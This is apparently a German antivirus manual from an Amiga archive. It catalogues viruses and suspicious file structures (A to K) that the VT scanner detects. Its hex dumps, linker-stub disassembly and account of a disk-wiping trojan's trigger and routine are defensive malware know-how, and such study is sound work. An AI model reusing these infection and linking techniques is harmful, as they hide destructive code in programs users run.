AmigActive 11

home *** CD-ROM | disk | FTP | other *** search

/ AmigActive 11 / AACD11.ISO / AACD / System / VTTest3 / Schutz / VT.Dokumente / VT.kennt_A-K < prev next >

Wrap

Text File | 2000-06-24 | 524KB | 10,769 lines

VT3.17 kennt_A-K: ================= (oder sollte erkennen) Stand: 2000-06-24 Heiner Schneegold Am Steinert 8 97246 Eibelstadt Deutschland Tel. 09303/99104 (bitte nur 19.00 - 20.00 Uhr) EMail: Heiner.Schneegold@t-online.de Hinweis 15.05.94: Viele BB-Viren nehmen KEINE Ruecksicht auf das FileSystem. Also auch auf eine Disk mit FFS-Struktur (DOS1/3/5) wird ein DOS0-BB-Virus geschrieben. Beim Filetest mit VT wuerden dann nur bad.Data ange- zeigt. Dies sollten Sie als Hinweis nehmen, den Versuch mit einem FFS-BB zu wiederholen. ABER viel schlimmer. Falls Sie bei einer Disk mit falschem DOS-BB einen Schreibzugriff versuchen, muessen Sie damit rechnen, das die Disk-Struktur zerstoert wird !!!! Versuchen Sie nach diesem Fall einen FFS-BB zu installieren und fuehren Sie dann den Filetest noch einmal durch. Wenn nicht zu viele Files defekt sind, koennen Sie auch mit Disksalv einen Rettungsversuch unternehmen. Hinweis 10.05.94: Fordert trackdisk.device NICHT Das Virusteil greift auf das Device zu, das im Moment durch DoIo (Read, Write usw.) aktiv ist. Das kann auch ein Festplatten.device (scsi.device, gvpscsi.device usw.) sein. Es wuerde also der Rigid.BB der HD zerstoert. Nach dem naechsten Reset koennte dann von dieser Festplatte nicht mehr gestartet werden. Keine schlechte Idee waere es, Zylinder 0 der HD mit VT in zeige Zyl. herauszusichern, oder sich mit LW-info einen Ausdruck vom Aufbau der HD zu beschaffen. Dann waere es im Fall eines Falles mit der HD-ToolBox von Commodore moeglich, die HD neu aufzubauen, wenn nur der Rigid-Bereich vom Virus-Teil zerstoert worden ist. Hinweis 26.07.93: Sollte beim Test HARDLink oder SOFTLink auftauchen, so handelt es sich weder um einen Virenbefall noch um einen Cruncher, sondern um den Hinweis auf eine Routine des Betriebssystems. Nachzu- lesen bei VT3.xyd am Ende von FileTest. Hinweis 10.10.93: Bei aelteren BBen kann es vorkommen, dass VT "unbe- kanntes Programm", "Resstruc ungerade", "Resstruc leer" ausgibt. Dies ist KEIN Fehler von VT, sondern liegt daran, dass der Speicher fuer das Virusteil NICHT mit allocmem als belegt gekennzeichnet wird bei der Installierung im Speicher. Manche BB sind wenigstens noch soweit, dass sie nach einem RESET den Speicher anmelden. Bei 1MB ist nun die Gefahr gross, das ein Programm z.B. VT das Virusteil ueberschreibt. Eine Vermehrung ist dann natuerlich auch nicht mehr moeglich. ABER !!!! Der KickTag-Zeiger, Cool-Zeiger oder Cold-Zeiger bleibt ja verbogen (geschuetzt in ExecBase). Also ueberprueft VT die Vektoren, findet nichts passendes dazu und gibt deshalb obengenannte Warnungen aus. Die gleichen Viren (z.B. SCA ) werden mit 5MB Speicher SICHER erkannt im Speicher. Im BB MUSS VT diese Viren IMMER finden, da es hier kein Speicherproblem gibt. Im schlimmsten Fall kann es mit nur 1MB CHIP und KEIN Fastmem zum GURU kommen, wenn das Virusteil seinen Speicher nicht anmeldet und z.B. DoIo verbiegt. VT ueberschreibt dann schon beim Laden den "Virusspeicherbereich", zerstoert den DoIo und dies fuehrt zu einem GURU. Dies hat NICHTS mit VT zu tun, sondern kann mit anderen gros- sen Programmen genauso nachvollzogen werden !!!!! - bekannte Viren (die ich habe): ============================== Test auf mind. drei Langworte im Speicher Kein FastMem heisst, dass das VirusPrg mit FastmemKarte bei mir abstuerzt, koennte aber mit $C00000 oder einer anderen Fastmem-Karte laufen ???? - *-Filename KEIN Virus !!!!!!! Der Filename besteht nur aus einem * und die Filelaenge ist meist Null. Sollte nur auf uralten PD-Disks auftauchen. Dieses File ent- steht durch die Fehlfunktion eines uralten Prgs, das dann auch im C-Verzeichnis zu finden sein sollte. Sie sollten diese *-Files loeschen, da das * bei einigen DOS-Funktionen ein Fehlverhalten ausloesen kann. Wer es nicht glaubt, moege bitte eine solche Disk in der ORIGINAL Commodore- AmigaShell kopieren. Verwenden Sie bitte den Befehl: copy df0: df1: all (Return) Na sind Sie von dem Ergebnis ueberrascht ?? - 3c(a7)-Link Diese Variante ist im Dez. 93 aufgetaucht. Die Routine ist keine Neuentwicklung, sondern wurde von Packern abgeschaut. Da sich VT nicht sicher ist, bietet das Programm nur weiter an. Bei einigen Programmen - die ich habe (Dotty-MAFIA-Inst.) -, bietet VT loeschen an. Alle mir bekannten Links (Stand Jan 94) verwenden im Programm absolute Speicheradressen, die normal nur auf wenigen Rechnertypen vorhanden sind. Also nach meiner Meinung keine zu grosse Gefahr. - 3E8-Hunk 3F0-Hunk 3F1-Hunk WICHTIG WICHTIG WICHTIG WICHTIG WICHTIG WICHTIG WICHTIG 99% der von VT erkannten Hunktypen werden NICHTS mit einem Virus zu tun haben !!! Also bitte, die Aussage "3E8-Hunk=Virus" ist MEIST FALSCH !!! WICHTIG WICHTIG WICHTIG WICHTIG WICHTIG WICHTIG WICHTIG Die obengenannten Hunktypen sind fuer den Programmablauf nicht notwendig. Ehrliche Programmierer verwenden diese Hunks, um z.B. mit Kontrollstrukturen den sauberen Ablauf ihres eigenen Programms auszutesten. Andere Programmierer legen in einen Hunktyp die Versions-Nummer. Also alles in Ordnung. Wieder andere Programmierer versuchen durch diese Hunktypen am Fileanfang, einen Virus-Link zu verhindern, da die meisten Link- Viren auf $3E9 geprueft haben. TUT MIR LEID. DIESE ZEITEN SIND VORBEI. Neuere Viren koennen diese Hunktypen am Fileanfang ueber- springen. Einige Negativbeispiele: Dark Avanger 3E8, 3F0, 3F1 BURN-Virus 3F1 MENEM'S REVENGE 3E8, 3F0, 3F1 FileGhost-2 3E8, 3F0, 3F1 FileGhost-3 3E8, 3F0, 3F1 BBS-Traveller 3E8, 3F0, 3F1 usw. ABER ABER ABER !!! Es sind mindestens zwei Shareware-Programme bekannt, die auf Mausklick VOR ein bestehendes Programm z.B. einen 3E8-Hunk haengen. Dies nutzen nun seit Dez. 93 einige weniger nette Zeitgenossen aus, um ihr Virusteil zu verstecken. Da die Filestruktur veraendert wird, kann es Probleme fuer Antivirusprg.e geben, obwohl das Virus- teil UNVERAENDERT, also ohne 3E8-Hunk erkannt werden wuerde. Testablauf: Falls VT diese Hunktypen an einem File erkennt, brechen Sie bitte den Scan-Vorgang ab. Kopieren Sie das File ins RAM: oder auf eine leere Disk. Gehen Sie danach in den VT-Filerequester. Klicken Sie das File an. Klicken Sie auf Convert. (Ja, ich war zu faul, dafuer ein eigenes Gadget zu opfern). VT sollte nun den Hunk ausbauen und das File neu abspeichern. moegliche Fehlermeldungen: - nichts Bekanntes (es ist gar kein 3E8-Hunk) - Fehler (VT findet keinen Anschlusshunk oder das File ist irgendwie beschaedigt) Da inzwischen ein File mit einem 3E8-Hunk UND einem 3F1-Hunk am Anfang aufgetaucht ist, muessen Sie den Ausbau (convert) halt wiederholen !!!! Danach klicken Sie bitte im Filerequester auf FileTest: - nichts Bekanntes (hoechstwahrscheinlich kein Virusteil aber nicht sicher. Es tauchen immer wieder neue Viren auf.) - VT erkennt ein Virusteil - VT erkennt einen Packer (Hier sollten bei Ihnen IMMER die Alarmglocken anschlagen.) Entpacken Sie das File mit dem entsprechenden Packer. Mit etwas Pech werden Sie dann mit VT oder einem Filemonitor ein Virusteil erkennen. Hinweis: Auf der Fish-CD Dez93 (Auslieferung Mitte Jan 94) findet VT mehrere 3F1-Hunks. Die betroffenen Programme wurden nach RAM: kopiert und ueberprueft. Sie sind ALLE sauber. Die Aussage gilt NUR fuer diese CD !!!! Nachtrag Feb. 94: Es haben mich inzwischen Anrufe erreicht, dass nach dem Ausbau von 3F1-Hunks das Programm nicht mehr lauffaehig sei. Da ich solche Tricks befuerchtet habe, koennen Sie diese Hunks ja auch nicht im Filetest ausbauen, sondern muessen in den VT-Filerequester gehen und mit dem Gadget "Convert" arbeiten. Also BITTE kopieren Sie solche Files auf eine leere Disk, aktivieren Sie Convert UND (!!!!!!!) ueberpruefen Sie dann die Lauffaehigkeit des ver- kuerzten Programms. Es scheinen sich viele Spieleprogrammierer NICHT (!!!!!!) an die Vorgaben von Commodore fuer den 3F1-Hunk zu halten. Ich habe das noch einmal mit 3F1-Hunks auf der Fish-CD probiert. KEIN Programm enthielt einen Virus und sie waren nach dem Ausbau LAUFFAEHIG !!!!! Negativbeispiel: Anruf wegen dpaint IV AGA (wenn ich es richtig verstanden habe): 3F1-Hunk von dpaint entfernt. Programm aus cli gestartet. Meldung: dpaint nicht gefunden 3F1-Hunk von dpaint modifiziert. Programm aus cli gestartet. Meldung: dpaint falsch installiert Also: Bitte, Bitte arbeiten Sie bei 3F1-Hunks mit einer KOPIE UND ueberpruefen Sie die LAUFFAEHIGKEIT. Danke Nachtrag Maerz 95: Es sind inzwischen Files mit 3E8-Hunk am Anfang aufgetaucht und dahinter dann gepackte Teile. Falls also VT nach 3E8-Hunk Ausgabe zusaetzlich noch z.B. Powerpacker ausgibt, dann sollten bei IHNEN die Alarmglocken laeuten. Da versucht jemand etwas zu verstecken. UNBEDINGT nachpruefen !!!! vgl. auch Cop Typ B u C siehe unten - 3E8-HiS-Hunk 00000001 000004ae 00000647 000003e8 ...........G.... 00000001 48695300 000003e9 000004ae ....HiS......... Es koennte sich um ein Prg. handeln, das mit einem Pascal-Com- piler erzeugt wurde. Versuchen Sie z.B. mit PP einen Ausbau und ueberpreufen Sie die Lauffaehigkeit. Die Programme sollten danach immer noch laufen, da genuegend Pascal-Prge. bekannt sind, die diesen UNNOETIGEN 3E8-Hunk NICHT haben. Der Pro- grammierer raubt Ihnen auf ihrem Speichermedium SINNLOS Platz. - 3E8-*Art-Hunk Dieser 3E8-Hunktyp wurde mehrmals vor Viren gefunden (z.B. COP-DOpus usw.). Aber es MUSS sich NICHT IMMER ein Virus da- hinter verstecken !!!!!!!!!! 0000: 000003f3 00000000 00000002 00000000 ................ 0010: 00000001 0000009e 00020fb7 000003e8 ................ 0020: 00000001 2a417274 000003e9 0000009e ....*Art........ Moeglichkeit a: Es gibt ein Utility-Prg., das immer einen 3E8-Hunk mit diesem Text (*Art) erzeugt. (Kenne ich NICHT) Moeglichkeit b: Ein Virenprogrammierer verwendet dieses Teil zum Selbstschutz und/oder zur Kennzeichnung "seiner Viren". - 3F1-HEADDBGV-Hunk 00000000 00000033 000003f1 0000000c .......3........ 0039d25b 48454144 44424756 30310000 .9.[HEADDBGV01.. Dieser 3F1-Hunk am Fileanfang scheint MEIST ausbaubar zu sein, ohne die Lauffaehigkeit des Programms zu verhindern (aber nicht immer). Fertigen Sie bitte vor Ausbau eine Kopie an. Getestet wurde dies mit einigen Files (z.B. lawbreaker). Nachtrag Mai 94: laut Tel.-Auskunft erzeugt zum Beispiel Dice reg. so einen 3F1-Hunk. Aber bitte: Was sollen ein Hunk-Debug oder Hunk- Symbol in einem Prg., das veroeffentlicht wird. Diese Hunks sind fuer den Endanwender NUTZLOS, verlaengern nur unnoetig das Programmfile und rauben Ihnen auf ihrem Speichermedium SINNLOS Platz. Nachtrag Nov 94: Wenn Sie mit VT/Sp->File->Sp/Convert nicht arbei- ten wollen, dann verwenden Sie im PowerPacker in der Menueleiste Hunklab. Ein Beispiel: xpkarchive.library V1.0 vor Ausbau: 44008 nach Ausbau: 13328 Wenn das nicht eine UEBERFLUESSIGE Platzverschwendung ist ??? - 3F1-X-Fucker-Hunk EIN Virus !!!!!! Lesen Sie bitte nach bei X-Fucker 0000: 000003f3 00000000 00000001 00000000 ................ 0010: 00000000 00000411 000003f1 00000003 ................ 0020: 2f582046 75636b65 72000000 000003e9 /X Fucker....... - 4711-Virus Saddam-Disk-Validator-Clone s.u. - 4EAE-Virus siehe bei B.E.O.L.-LVirus - $4EB9-Link ?? Fileauszug: 0000: 000003f3 00000000 0000000d 00000000 ................ 0010: 0000000c 00000004 00000014 00000630 ...............P 0020: 400000cc 00000001 0000007c 0000042a @..............+ 0030: 00000486 00000014 000026d8 0000007c ..........&..... 0040: 000013aa 00000923 000003e9 00000004 .......#........ 0050: 4eb90000 00004eb9 00000000 70004e75 N.....N.....p.Nu 0060: 000003ec 00000001 00000001 00000002 ................ 0070: 00000001 00000008 00000008 00000000 ................ 0080: 000003f2 000003e9 00000014 48e7ffff ............H... Diese Struktur taucht in letzter Zeit immer haeufiger im Zusam- menhang mit gelinkten Viren auf. Bei den Viren handelt es sich in der Regel um "alte" Teile, die aber nicht erkannt werden koennen, da die Testlangworte an einer anderen Stelle liegen. Vermutlich wurde die Struktur von einer Szene-Gruppe entwickelt, um ein Intro vor ein Programm linken zu koennen. Diese Struktur wird nun abgekupfert (oder es existiert sogar ein Programm dafuer ??). Also BITTE, BITTE nicht bei jedem $4eb9 sofort loeschen, sondern nachdenken und das File erst auf eine andere Disk kopieren. Der groesste Teil der gefundenen Programme wird wahrscheinlich der Szene zuzuordnen sein, d. h. das Spiel wird nach dem Loeschen NICHT mehr laufen. Bitte helfen SIE mit, die Virus-Programme her- auszufiltern und schicken Sie die Programme bitte an mich. Wenn es geht mit Tel. Nr. . Ich rufe dann zurueck, sobald ich das Teil entschluesselt habe. Ich sichere noch einmal zu, dass sowohl Telefonnummern als auch Adressen nach Erledigung der Arbeit in den Abfalleimer wandern. Struktur: Ab $84 beginnt das gelinkte Virus-Teil Ab $48 beginnt der Ausloeser-Hunk. Er ist sehr kurz (4) und enthaelt nur 2 Sprungbefehle jsr ($4EB9), moveq 0,d0 (7000) und ein rts (4e75). Danach folgt ein Reloc-Hunk fuer die jsr-Befehle. Ablauf: Der 1. jsr-Befehl installiert das Virus-Teil und kehrt zurueck. Der 2. jsr-Befehl fuehrt das Nutzprogramm aus und kehrt nach Be- endigung des Programms zurueck. Danach wird d0 geloescht und mit rts das ganze File beendet. So einfach ist das. Hinweis 07.06.93: Es sind auch 4EB9-Links aufgetaucht, bei denen das Virusteil mit dem 2. jsr-Befehl installiert wird. ALLE angelinkten Virenteile waren gepackt, wohl um Reloc-Probleme zu minimieren. HINWEIS ab VT2.54 : Sie koennen jetzt im File-Requester Teil 1 oder 2 abschalten. Link1aus - schaltet den Programmteil 1 ab. Link2aus - schaltet den Programmteil 2 ab. Dies kann natuerlich nur ein NOTNAGEL sein. Besser ist es, wenn Sie mir das verseuchte Teil zuschicken und noch mehr erleichtern Sie mir meine Arbeit, falls Sie zufaellig das Programm auch im ungelinkten Zustand besitzen. Bitte fertigen Sie sich von dem gelinkten Programm zwei ver- schiedene Namenskopien auf einer sonst leeren Disk an. Schalten Sie danach an Kopie 1 den Link 1 ab und an Kopie 2 den Link 2 ab. Wenn Sie Glueck haben, ist ein lauffaehiges Programm dann ohne Virusteil oder ohne Intro !! Aber !!! Es ist auch moeglich, dass das Haupt-Programm NICHT mehr laeuft. Warum ? Beispiel: Eine Gruppe hat ein Intro vor ein Spiel gelinkt. Dann koennen in diesem Intro schon Veraenderungen am Computer (FastRam ab- schalten usw.) vorgenommen werden, die das Spiel voraussetzt. Ohne das Intro ist das Spiel dann logischerweise nicht lauf- faehig. Beispiele sind bekannt !!!! MERKE: Ein File mit abgeschaltetem LINK gibt man NICHT weiter!!! Hinweis 28.06.93 : Das Erzeugerprogramm fuer den $4EB9-Link scheint gefunden zu sein. Ein Programm mit Namen: Chain V0.23 Danke fuer den Hinweis Hinweis 24.09.93: Es soll eine neue 4EB9-Variante aufgetaucht sein. 46696c65 2d636861 696e2069 6e636c75 File-chain inclu 64696e67 3a20006d 656e7500 77640000 ding: .menu.wd.. 000003e9 00000007 48e7fffe 4eb90000 ........H...N... 00004cd7 7fff4eb9 00000000 4cdf7fff ..L..N.....L.. 70004e75 000003ec 00000001 00000001 p.Nu............ Sie koennen im File-Requester Teil 1 oder 2 abschalten. Bitte lesen Sie ein paar Zeilen weiter oben nach. Nachtrag 04.94: Das Erzeuger-Programm scheint gefunden zu sein. File-Chainer V1.3 Danke fuer den Hinweis . - $4EB9+PP-Link Am Fileanfang ist zu lesen: 00064e75 4d4f5061 636b6572 000003ec ..NuMOPacker.... Jemand versucht mit der 4EB9-Methode ein PP-gepacktes File zu verstecken. Lassen Sie das Teil ausbauen und danach werden die entsprechenden Prg.e ein PP-File erkennen, das Sie dann weiter untersuchen koennen. Es wurde MEIST KEIN Virus in solchen Files gefunden. Aber gehen Sie bitte auf Nummer sicher. Sie koennen das File zur Sicherheit auf eine Disk kopieren, im VT-Filereq. mit "Link1aus" auch ausbauen und dann die Lauffaehigkeit testen. - $4EB9-RTS-Link ?? Fileauszug: 0000: 000003f3 00000000 00000008 00000000 ................ 0010: 00000007 00000004 00000001 0000001e ................ 0020: 00000032 00002215 00000080 00000e20 ...2.."........ 0030: 00000940 000003e9 00000004 4eb90000 ...@........N... 0040: 00004eb9 00000000 70004e75 000003ec ..N.....p.Nu.... 0050: 00000001 00000001 00000002 00000001 ................ 0060: 00000002 00000008 00000000 000003f2 ................ 0070: 000003e9 00000001 42804e75 000003f2 ........B.Nu.... ^^^^ ^^^^^^^^ 0080: 000003e9 0000001e 48e7ffff 49fa005e ........H...I..^ Der erste gelinkte Hunk besteht nur aus einem Langwort und ent- haelt: 4280 clr.l d0 4e75 rts Dies sollte Sie nachdenklich machen. Da will jemand etwas ver- stecken. Versuchen Sie mit einem File-Hex-Editor den Anfang ab- zuschneiden. Wahrscheinlich werden Sie dann auf ein gepacktes File stossen. Dieses sollten Sie zur Sicherheit auch noch ent- packen. Notwendige Aenderungen mit Monitor in diesem Fall: 0050: 00000001 000003f3 00000000 00000006 0060: 00000000 00000005 0000001e 00000032 0070: 00002215 00000080 00000e20 00000940 0080: 000003e9 0000001e 48e7ffff 49fa005e Mit dem Editor ab $54 abspeichern. - $4EB9-$4EF9-Link ?? Fileauszug: 0000: 000003f3 00000000 0000000e 00000000 ................ 0010: 0000000d 00000005 00000089 000008d3 ................ 0020: 00000005 00000089 00000126 0000001d ...........&.... 0030: 0000e945 400000ac 00002085 40004485 ...E@..... .@.D. 0040: 0000007c 00008926 0000123a 000003e9 ...|...&...:.... 0050: 00000005 48e7fffe 4eb90000 00004cdf ....H...N.....L. 0060: 7fff4ef9 00000000 000003ec 00000001 .N............. Dis: 0054: 48E7 FFFE MOVEM.L D0-D7/A0-A6,-(A7) 0058: 4EB9 00000000 JSR L000001 005C: 4CDF 7FFF MOVEM.L (A7)+,D0-D7/A0-A6 0062: 4EF9 00000000 JMP L00002D Hinweis: Falls VT diese Struktur an einem File erkennt, kann das angelinkte Teil ein Trainer, ein Intro oder AUCH EIN Virus sein. Lesen Sie bitte dazu bei $4EB9-Link (oben) nach. Sie koennen jetzt im File-Requester an Files, die im FileTest als $4EB9-$4EF9-Link erkannt wurden, Teil 1 oder Teil 2 abschalten. Rest siehe oben Hinweis: Es wird das $4EB9-$4EF9-Link-Programm gesucht. Da Ende Nov 93 schlagartig mehrere solche Links aufgetaucht sind, vermute ich, das es dafuer ein Programm gibt. Nachtrag 04.94: Das Erzeuger-Programm scheint gefunden zu sein. ExeLink V1.1 Danke fuer den Hinweis . - $4EB9-4EF9-RTS-Link Fileauszug: 0000: 000003f3 00000000 00000004 00000000 ................ 0010: 00000003 00000005 00000001 00000083 ................ 0020: 00001ceb 000003e9 00000005 48e7fffe ............H... 0030: 4eb90000 00004cdf 7fff4ef9 00000000 N.....L..N..... 0040: 000003ec 00000001 00000001 00000006 ................ 0050: 00000001 00000002 00000010 00000000 ................ 0060: 000003f2 000003e9 00000001 4e750000 ............Nu.. ^^ ^^^^ 0070: 000003f2 000003e9 00000083 48e7fffe ............H... Der erste gelinkte Hunk besteht nur aus einem Langwort und ent- haelt: 4e75 rts Dies sollte Sie nachdenklich machen. Da will jemand etwas ver- stecken. Versuchen Sie mit einem File-Hex-Editor den Anfang ab- zuschneiden. Wahrscheinlich werden Sie dann auf ein gepacktes File stossen. Dieses sollten Sie zur Sicherheit auch noch ent- packen. Notwendige Aenderungen mit Monitor in diesem Fall: 0050: 00000001 00000002 000003f3 00000000 0060: 00000002 00000000 00000001 00000083 0070: 00001ceb 000003e9 00000083 48e7fffe Mit dem Editor ab $58 abspeichern. - $4EB9-Text-Link ?? An ein Programm wurde mit $4EB9 ein Text angelinkt, der im Cli mit Dos-Routinen ausgegeben wird. KEIN Virus !! VORSICHT !! VORSICHT !! VT versucht im Filetest einen Ausbau !!!!! Dieser Vorgang MUSS NICHT gelingen. Es kann sein, dass das Programm danach NICHT mehr lauffaehig ist. Fertigen Sie deshalb bitte VORHER eine Kopie an. Danke. Falls weitere derartige Anhaengsel bekannt sind, bitte ich um Zusendung. Am Fileanfang ist z.B. zu lesen: 20202020 542e442e 422e2046 524f4d20 T.D.B. FROM 4c454745 4e442120 50524553 454e5453 LEGEND! PRESENTS 204a5553 5420464f 52204655 4e210a0a JUST FOR FUN!.. ;usw. .... - $4EB9-Text-MausT ?? Nachtrag Maerz 94: Laut Telephonanrufen gibt es auch $4EB9-Text- Link-Files, die nur aus einer Gruppenmitteilung und dem Ab- fragen der linken Maustaste bestehen. Hier ist dann natuerlich ein Ausbau unsinnig. Loeschen Sie bei Bedarf das ganze File und aendern Sie dann auch s/startup-sequence ab. Bitte machen Sie aber VORHER eine Kopie der Disk. Sollte der Text die Aufforderung enthalten, eine andere Disk einzulegen, dann ist das Loeschen natuerlich nicht angebracht. Danke - $6c(Proc)<>PStart Der Zeiger $6c in der ProcessStruktur zeigt bei allen mir be- kannten Nutzprogrammen auf den Process-Struktur-Start. Dieser Zeiger wird nun von Hanf- und Smeg-Virus (s.u.) auf den eigenen Bereich verbogen. Da ich mit Nachahmern rechne, gibt VT eine Warnung aus. Es kann sich also um einen Nachbau ODER ABER um ein sauberes Nutzprogramm handeln. Bleiben Sie ruhig und ver- suchen Sie das Programm zu finden, dass diesen Zeiger verwendet. Es steht in dem VT-Requester mit KEINEM Buchstaben, das es sich um einen Virus handeln MUSS. Falls Sie so ein Nutzprogramm fin- den, waere ich fuer einen Hinweis sehr dankbar. Nuetzlich waere neben dem Programmnamen auch die Bezugsquelle (z.B. Aminet/xyz/abc). Danke - $B4(Process) siehe auch bei BEOL-3 Der Zeiger $B4 in der ProcessStruktur ist MEIST Null. Dieser Zeiger wird nun von BEOL3 und BEOL96 verbogen. Da ich mit Nachahmern rechne, zeigt VT an "$B4(Process)>0 ???". Es duerfte sich NICHT um BEOL3 oder BEOL96 handeln, denn diese Teile sollte VT mit Namensangabe finden. Es kann sich also um einen Nachbau ODER ABER um ein sauberes Nutzprogramm handeln. Bleiben Sie ruhig und ver- suchen Sie das Programm zu finden, dass diesen Zeiger verwendet. Es steht in dem VT-Requester mit KEINEM Buchstaben, das es sich um einen Virus handeln MUSS. Hinweis 96-10-05: Im Netz ist eine Meldung aufgetaucht, dass das Nutzprogramm DiskExpander diesen Zeiger verwendet. Schauen Sie bitte in Ihrer startup-sequence nach, ob eine DiskExpander-Zeile existiert. Falls ja, koennen Sie diese Zeile zu Versuchszwecken mit einem Strich- punkt versehen und den Computer neu Booten. Kommt die $B4-Warnung nicht mehr, so haben Sie den UNGEFAEHRLICHEN Ausloeser gefunden. Ich werde aber versuchen, dass VT bei DiskExpander KEINE Ausgabe mehr vornimmt. Hinweis 97-09-15: Weiteres bekanntes Nutzprogramm: VNC-shell VT nimmt hier keine Ausgabe vor. Falls Sie weitere Programme finden (ich selbst habe bei den Pro- grammen, die ich verwende, immer Null gefunden), waere ich fuer einen Hinweis sehr dankbar. Nuetzlich waere neben dem Programm- namen auch die Bezugsquelle (z.B. Aminet/xyz/abc). Danke - $EF67A3C3-LVirus siehe unten bei EF67A3C3-LVirus - $FA58B1EF-LVirus siehe unten bei FA58B1EF-LVirus - $FFFFFFE9-Virus siehe unten bei B.E.O.L.-LVirus - .info anderer Name: TimeBomb V0.9 s.u. - 1.Hunk > Filelaenge Eine Fehlermeldung und NICHT IMMER ein Virusteil Im Langwort hinter der CodeHunk-Kennung (3E9) steht die Laenge des 1.Hunks. Mal 4 und in Dez umgewandelt ergibt sich die Laenge des 1.Hunks. VT glaubt nun ein File gefunden zu haben, bei dem die Hunklaenge groesser ist als die abgespeicherte Filelaenge. Ausgabe deshalb: File defekt . Moegliche Ursachen: a) Beim Copy ist etwas schief gegangen. Kann ich an zwei uralten PD-Disks belegen. b) Ein Virus (Commander, Invader usw.) hat sehr grosse Probleme mit 68040+Cache. Dies kann jeder durch Tests sehr leicht nach- vollziehen. c) Ein Trick, den ich nicht kenne. Diese Files sollten Sie mit einem Filemonitor untersuchen. Falls die Files wirklich defekt sind, bleibt Ihnen leider nur Loeschen uebrig. Falls Sie Fehlerkennungen durch VT finden, bitte ich Sie um eine Mitteilung. Danke !! - 1599-Trojan (Computer-Uebernahme) siehe bei Port-1599-Trojan - 67-Trojan (Computer-Uebernahme) siehe bei Port-67-Trojan - 16 Bit Crew Cool, im Prg. noch DoIo, FastMem ja, im Speicher immer ab $7ec00 Vermehrung: ueber BB im BB steht unverschluesselt: The 16 Bit Crew 1988 - 16BIT-TAI8-Clone Nur Text geaendert: 00000000 000003f2 00000000 38543841 ............8T8A 3849382e 2e2e2e2e 00000000 00000000 8I8............. - 2001 SCA-Clone, Cool immer 7EC3E, nur anderer Text - 3F2 fehlt Eine Fehlermeldung VT hat versucht, etwas an einem File zu veraendern. Dabei, und NUR in diesem Fall, hat VT festgestellt, dass am Fileende die Kennung 3F2 fehlt. Bitte ueberpruefen Sie, ob nicht schon beim verseuchten File die Fileende-Kennung (3F2) fehlt. Diese Files sind dann nicht zu retten. Hinweis: Es gibt einen uralten Cruncher, der die Endekennung ent- gegen RKM-Vorgaben weglaesst. - 666!-Trojan Zerstoerungsfile Anderer moeglicher Name: WBPrefs Laenge ungepackt: 63140 Bytes Laenge CrunchMania gepackt: ?????? wird gesucht !!!! Keine verbogenen Vektoren Nicht resetfest Namensbegruendung: Ueberschreibt Medium mit 666! (s.u.) Gibt am Ende der Arbeit einen Bildschirm aus: - heller Hintergrund - graue Schrift sehr gross 666! Mit der li. Maustaste koennen Sie dann abbrechen. Laut Mitteilung soll am Anfang der startup-sequence stehen: SYS:C/WBPrefs Da kein User bereit ist, ein Zerstoerungsprogramm aufzurufen, ver- mute ich, dass es ein Install-Prg. gibt. Ich suche also dringend das Install-Prg. und WBPrefs crunchmania- gepackt. Ich bedanke mich schon jetzt fuer Ihre Mithilfe. Danke WBPrefs aus der startup-sequence gestartet, erstellt ein Prozess. Fileauszug von WBPrefs: 70144e75 646f732e 6c696272 61727900 p.Nudos.library. 616d6967 616c6962 2e70726f 63657373 amigalib.process Sinnvolles macht das File nicht. Dieser Prozess holt in gewissen Zeitabstaenden die Systemzeit (DateStamp-Struktur). Sobald dann die Systemzeit zwischen 5.00 und 8.00 Uhr liegt, wird diese Schleife verlassen. Wenn Sie eine richtig gehende Hardwareuhr haben, eine ungewoehnliche Zeit, aber SEHR gefaehrlich fuer Mailboxen. Wenn Sie keine Uhr im Amiga haben oder die Uhr verstellt ist, koennen Sie natuerlich auch um 16.00 Uhr (echt) eine Systemzeit von 6.00 Uhr haben. Danach: - ein Speicherbereich wird mit eori.b #$8E,d0 decodiert. Es ergibt sich S:HORSE Es wird nun versucht dieses File zu oeffnen. Falls ja, dann Programmende. Also wahrscheinlich ein Schutz fuer den Programmierer. - Ueber DosEnvec Test ob - Low-Zyl hoeher 0 - mehr als #22 Sektoren - oder mehr als #100 Zylinder - oder mehr als 2 Koepfe Falls nicht mindestens eine Bedingung erfuellt ist => Abbruch Das kommt Ihnen bekannt vor. Richtig: lesen Sie bei ModemCheck-Virus nach. Die gefunden Medien werden zerstoert. lZyl 0 Bl 0 0000: 36363621 36363621 36363621 36363621 666!666!666!666! 0010: 36363621 36363621 36363621 36363621 666!666!666!666! 0020: 36363621 36363621 36363621 36363621 666!666!666!666! Durch die Zerstoerungsroutine werden die Bloecke mit 666! aufgefuellt. Es gibt leider KEINE Rettung fuer das Medium. Es bleibt nur Format. Am Schluss wird noch eine Graphik ausgegeben. s.o. VT versucht den Prozess abzuschalten. GURU-Gefahr VT erkennt NUR das ungepackte File und bietet Loeschen an. Vergessen Sie bitte nicht die Zeile in der startup-sequence auch zu loeschen - 67-Trojan (Computer-Uebernahme) siehe bei Port-67-Trojan - A.H.C.-Virus BB nur KS1.3 immer ab $7FA00 Cool $7FAFE, DoIo 7FFB3E Sollte auch mit KS1.2 laufen. Leider hat der Superprogrammierer beim Nachbau $23FC mit $33FC verwechselt. Ja das Augenlicht !!! Ursprung: groessere Teile wurden bei Sherlock_Anti.BB abge- kupfert. Fordert trackdisk.device NICHT !!!! Namensbegruendung: siehe unten Schaeden: gibt immer wieder mehrere verschiedene Alert-Meldungen aus. siehe unten Vermehrung: BB Im BB ist zu lesen: 790005bc 2048656c 6c6f2c20 412e482e y... Hello, A.H. 432e2073 7065616b 696e6720 68657265 C. speaking here 21212120 20200050 32d02020 20505245 !!! .P2. PRE 53532052 49474854 20425554 544f4e20 SS RIGHT BUTTON 20200050 50b42020 466f7220 6120676f .PP. For a go 6f642046 75636b2e 2e2e2041 2e482e43 od Fuck... A.H.C 2e212020 00202020 20200000 05e62049 .! . .... I 606d2074 68652041 2e482e43 2e2d5649 `m the A.H.C.-VI 52555320 00505000 20202020 20202020 RUS .PP. 20202020 20202020 20202020 20204920 I 636f6e74 726f6c20 796f7572 20636f6d control your com 70757465 72212121 00505000 00000000 puter!!!.PP..... 002e1eb0 2045696e 20647265 69666163 .... Ein dreifac 68657320 4d69746c 65696420 66fc7220 hes Mitleid f.r 41746172 69535400 50330020 412e482e AtariST.P3. A.H. 432e2028 68616861 68612920 20202020 C. (hahaha) 20202020 20202020 20202020 20202000 . - A.I.S.F.-Virus File Laenge: 8708 Bytes Von der Definition kein Virus, da keine Vermehrung. 